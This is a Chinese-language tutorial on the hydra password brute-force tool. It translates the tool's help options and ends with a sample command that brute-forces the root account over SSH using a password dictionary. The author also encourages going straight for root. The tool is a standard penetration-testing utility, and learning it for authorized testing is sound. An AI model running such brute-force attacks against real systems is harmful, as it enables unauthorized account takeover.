Linux登入暴力破解工具 hydra

hydra 是一個暴力破解工具，主要是針對Linux的。如果知道合法的使用者名稱更好，要是實在是不知道，那也沒關係，直接暴力破解root吧，一步到位。

先看下hydra -h的顯示，再慢慢解釋好了。

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]

server service [OPT]

Options:

-R        restore a previous aborted/crashed session

恢複中斷的會話

-S        connect via SSL

通過SSL串連

-s PORT   if the service is on a different default port, define it here

如果www.linuxidc.com不是預設的連接埠，指定連接埠

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-l是指需破解的使用者名稱，-L是指需破解的使用者所在的檔案

-p PASS  or -P FILE try password PASS, or load several passwords from FILE

載入密碼字典

-e ns     additional checks, "n" for null password, "s" try login as pass

嘗試空口令或者與使用者名稱相同的密碼

-C FILE   colon seperated "login:pass" format, instead of -L/-P options

指定一個含有login:pass的檔案，取代-L/-P選項

-M FILE   server list for parallel attacks, one entry per line

指定目標地址檔案，一行一個地址

-o FILE   write found login/password pairs to FILE instead of stdout

將找到的密碼寫入檔案中

-f        exit after the first found login/password pair (per host if -M)

找到密碼後退出

-t TASKS  run TASKS number of connects in parallel (default: 16)

指定線程數目，預設是16

-w TIME   defines the max wait time in seconds for responses (default: 30)

響應最大等待時間30s

-v / -V   verbose mode / show login+pass combination for each attempt

詳細模式

server    the target server (use either this OR the -M option)

目標ip地址

service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]   imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco  cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5   rexec rlogin pcnfs
snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere  teamspeak sip vmauthd firebird ncp

所支援的服務

OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.

Hydra is a tool to guess/crack valid login/password pairs - use allowed only

for legal purposes! If used commercially, tool name, version and web address

must be mentioned in the report. Find the newest version at http://www.thc.org

大致上就是如此了。現在來實際操作一下。

hydra -l root -P /home/Linux/passwd.dic -e ns -f -vV target_ip ssh2

當出現[STATUS] attack finished for target_ip (waiting for childs to finish) 時，表示已經破解成功。